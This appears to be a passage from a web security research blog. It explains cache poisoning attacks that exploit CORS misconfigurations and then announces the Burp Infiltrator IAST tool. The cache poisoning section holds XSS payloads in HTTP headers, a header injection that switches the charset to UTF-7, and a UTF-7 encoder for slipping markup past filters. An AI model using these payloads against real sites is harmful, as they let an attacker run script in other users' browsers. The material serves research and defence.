What happens if we ignore this advice? Mostly things just break. However, in the right circumstances it can enable some quite serious attacks.

Client-Side Cache Poisoning

You may have occasionally encountered a page with reflected XSS in a custom HTTP header. Say a web page reflects the contents of a custom header without encoding:
GET / HTTP/1.1
X-User-id: <svg/onload=alert(1)>

HTTP/1.1 200 OK
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-User-id
Content-Type: text/html
Invalid user: <svg/onload=alert(1)>
Without CORS, this is impossible to exploit as there’s no way to make someone’s browser send the X-User-id header cross-domain. With CORS, we can make them send this request. By itself, that's useless since the response containing our injected JavaScript won't be rendered. However, if Vary: Origin hasn't been specified the response may be stored in the browser's cache and displayed directly when the browser navigates to the associated URL. I've made a fiddle to attempt this attack on a URL of your choice. Since this attack uses client-side caching, it's actually quite reliable.
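The role of 'Vary: Origin' here can be illustrated with a toy cache (all URLs, origins and payloads are invented): when the cache key omits the origin, a response generated for the attacker's cross-origin request gets served to everyone who later loads the same URL.

```javascript
// Toy response cache. Without honouring Vary: Origin, the key is the URL
// alone, so one poisoned entry is returned for every subsequent request.
function makeCache(varyOnOrigin) {
  const store = new Map();
  const key = (url, origin) => varyOnOrigin ? url + '|' + origin : url;
  return {
    put: (url, origin, body) => store.set(key(url, origin), body),
    get: (url, origin) => store.get(key(url, origin))
  };
}

const noVary = makeCache(false);
noVary.put('/profile', 'https://evil.net', '<svg/onload=alert(1)>');
// A later same-URL load by the victim hits the poisoned entry:
console.log(noVary.get('/profile', 'https://victim-origin')); // '<svg/onload=alert(1)>'

const withVary = makeCache(true);
withVary.put('/profile', 'https://evil.net', '<svg/onload=alert(1)>');
console.log(withVary.get('/profile', 'https://victim-origin')); // undefined - cache miss
```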

Server-Side Cache Poisoning

If the stars are aligned we may be able to use server-side cache poisoning via HTTP header injection to create a stored XSS vulnerability.

If an application reflects the Origin header without even checking it for illegal characters like \r, we effectively have an HTTP header injection vulnerability against IE/Edge users, as Internet Explorer and Edge view \r (0x0d) as a valid HTTP header terminator:
GET / HTTP/1.1
Origin: z[0x0d]Content-Type: text/html; charset=UTF-7
Internet Explorer sees the response as:
HTTP/1.1 200 OK
Access-Control-Allow-Origin: z
Content-Type: text/html; charset=UTF-7
This isn't directly exploitable because there's no way for an attacker to make someone's web browser send such a malformed header, but I can manually craft this request in Burp Suite and a server-side cache may save the response and serve it to other people. The payload I've used will change the page's character set to UTF-7, which is notoriously useful for creating XSS vulnerabilities.
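To see why, recall that UTF-7 encodes characters as a modified base64 of their UTF-16BE form, so markup characters like '<' and '>' can be smuggled past filters as plain ASCII. A minimal single-block encoder sketch (this handles only the base64 run itself, not full RFC 2152 UTF-7):

```javascript
// Encodes a string as one UTF-7 base64 run: '+' <base64 of UTF-16BE> '-'.
function utf7Block(str) {
  const utf16be = Buffer.from(str, 'utf16le').swap16();   // reorder to big-endian
  return '+' + utf16be.toString('base64').replace(/=+$/, '') + '-';
}

console.log(utf7Block('<')); // '+ADw-'
console.log(utf7Block('>')); // '+AD4-'
// In a page parsed as UTF-7, these decode back to < and >, so a
// filtered '<script>' can be reconstructed by the victim's browser.
```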

Good Intentions and Bad Results

I was initially surprised by the number of sites that dynamically generate Access-Control-Allow-Origin headers. The root cause of this behavior may be two key limitations of CORS - multiple origins in a single header aren't supported, and neither are wildcarded subdomains. This leaves many developers with no choice but to do dynamic header generation, risking all the implementation flaws discussed above. I think that if the specification authors and browsers decided to allow origin lists and partial wildcards, dynamic header generation and associated vulnerabilities would plummet.

Another potential improvement for browsers is to apply the wildcard+credentials exception to the null origin. At present, the null origin is significantly more dangerous than the wildcard origin, something I imagine a lot of people find surprising.

Something else browsers could try is blocking what I've coined "reverse mixed-content" - HTTP sites using CORS to steal data from HTTPS sites. I have no idea what scale of breakage this would cause, though.

Simplicity and security may go hand in hand but by neglecting to support multiple origin declarations, web browsers have just pushed the complexity onto developers with harmful results. I think the main take-away from this is that secure specification design and implementation is fiendishly difficult.


CORS is a powerful technology best used with care, and severe exploits don't always require specialist skills and convoluted exploit chains - often a basic understanding of a specification and a little attentiveness is all you need. In case you're running low on coffee, as of today Burp Suite's scanner will identify and report all the flaws discussed here.

- @albinowax

Tuesday, July 26, 2016

Introducing Burp Infiltrator

The latest release of Burp Suite introduces a new tool, called Burp Infiltrator.

Burp Infiltrator is a tool for instrumenting target web applications in order to facilitate testing using Burp Scanner. Burp Infiltrator modifies the target application so that Burp can detect cases where its input is passed to potentially unsafe APIs on the server side. In industry jargon, this capability is known as IAST (interactive application security testing).

Burp Infiltrator currently supports applications written in Java or other JVM-based languages such as Groovy. Java versions from 4 and upwards are supported. In future, Burp Infiltrator will support other platforms such as .NET.

How Burp Infiltrator works

  1. The Burp user exports the Burp Infiltrator installer from Burp, via the "Burp" menu.
  2. The application developer or administrator installs Burp Infiltrator by running it on the machine containing the application bytecode.
  3. Burp Infiltrator patches the application bytecode to inject instrumentation hooks at locations where potentially unsafe APIs are called.
  4. The application is launched in the normal way, running the patched bytecode.
  5. The Burp user performs a scan of the application in the normal way.
  6. When the application calls a potentially unsafe API, the instrumentation hook inspects the relevant parameters to the API. Any Burp payloads containing Burp Collaborator domains are fingerprinted based on their unique structure.
  7. The instrumentation hook mutates the detected Burp Collaborator domain to incorporate an identifier of the API that was called.
  8. The instrumentation hook performs a DNS lookup of the mutated Burp Collaborator domain.
  9. Optionally, based on configuration options, the instrumentation hook makes an HTTP/S request to the mutated Burp Collaborator domain, including the full value of the relevant parameter and the application call stack.
  10. Burp polls the Collaborator server in the normal way to retrieve details of any Collaborator interactions that have occurred as a result of its scan payloads. Details of any interactions that have been performed by the Burp Infiltrator instrumentation are returned to Burp.
  11. Burp reports to the user that the relevant item of input is being passed by the application to a potentially unsafe API, and generates an informational scan issue of the relevant vulnerability type. If other evidence was found for the same issue (based on in-band behavior or other Collaborator interactions) then this evidence is aggregated into a single issue.
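Steps 6 to 8 can be pictured with a small sketch. This is purely illustrative: the real hooks are injected Java bytecode, and the fingerprinting and mutation details below are invented.

```javascript
// Sketch of steps 6-8: fingerprint a parameter for a Collaborator-style
// domain, then mutate it to encode an identifier of the intercepted API.
const COLLABORATOR_RE = /\b([a-z0-9]+)\.burpcollaborator\.net\b/;

function hookParameter(value, apiId) {
  const match = COLLABORATOR_RE.exec(value);
  if (!match) return null;                 // not a Burp payload (step 6)
  const mutated = apiId + '.' + match[0];  // encode the API id (step 7)
  // Step 8 would then resolve the mutated name, e.g. dns.lookup(mutated, ...),
  // signalling out-of-band to Burp which unsafe API received the payload.
  return mutated;
}

console.log(hookParameter("' OR 1=1--x7f3q.burpcollaborator.net", 'sql'));
// 'sql.x7f3q.burpcollaborator.net'
```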

Issues reported by Burp Infiltrator

Burp Infiltrator allows Burp Scanner to report usage of potentially dangerous server-side APIs that may constitute a security vulnerability. It also allows Burp to correlate the external entry point for a vulnerability (for example a particular URL and parameter) with the back-end code where the vulnerability occurs.

In the following example, Burp Scanner has identified an XML injection vulnerability based on Burp's existing scanning techniques, and also reports the unsafe API call that leads to the vulnerability within the server-side application.

Burp Infiltrator enables Burp to report:
  • The potentially unsafe API that was called.
  • The full value of the relevant parameter to that API.
  • The application call stack when the API was invoked.
This information can be hugely beneficial for numerous purposes:
  • It provides additional evidence to corroborate a putative vulnerability reported using conventional dynamic scanning techniques.
  • It allows developers to see exactly where in their code a vulnerability occurs, including the names of code files and line numbers.
  • It allows security testers to see exactly what data is passed to a potentially unsafe API as a result of submitted input, facilitating manual exploitation of many vulnerabilities, such as SQL injection into complex nested queries.

Important considerations

Please take careful note of the following points before using Burp Infiltrator:
  • You should read all of the documentation about Burp Infiltrator before using it or inducing anyone else to use it. You should only use Burp Infiltrator in full understanding of its nature and the risks inherent in its utilization.
  • You can use a private Burp Collaborator server with Burp Infiltrator, provided the Collaborator server is configured using a domain name, not via an IP address.
  • You can install Burp Infiltrator within a target application non-interactively, for use in CI pipelines and other automated use cases.
  • During installation of Burp Infiltrator, you can configure whether full parameter values and call stacks should be reported, and various other configuration options.
For more details, including step-by-step instructions, please refer to the Burp Infiltrator documentation.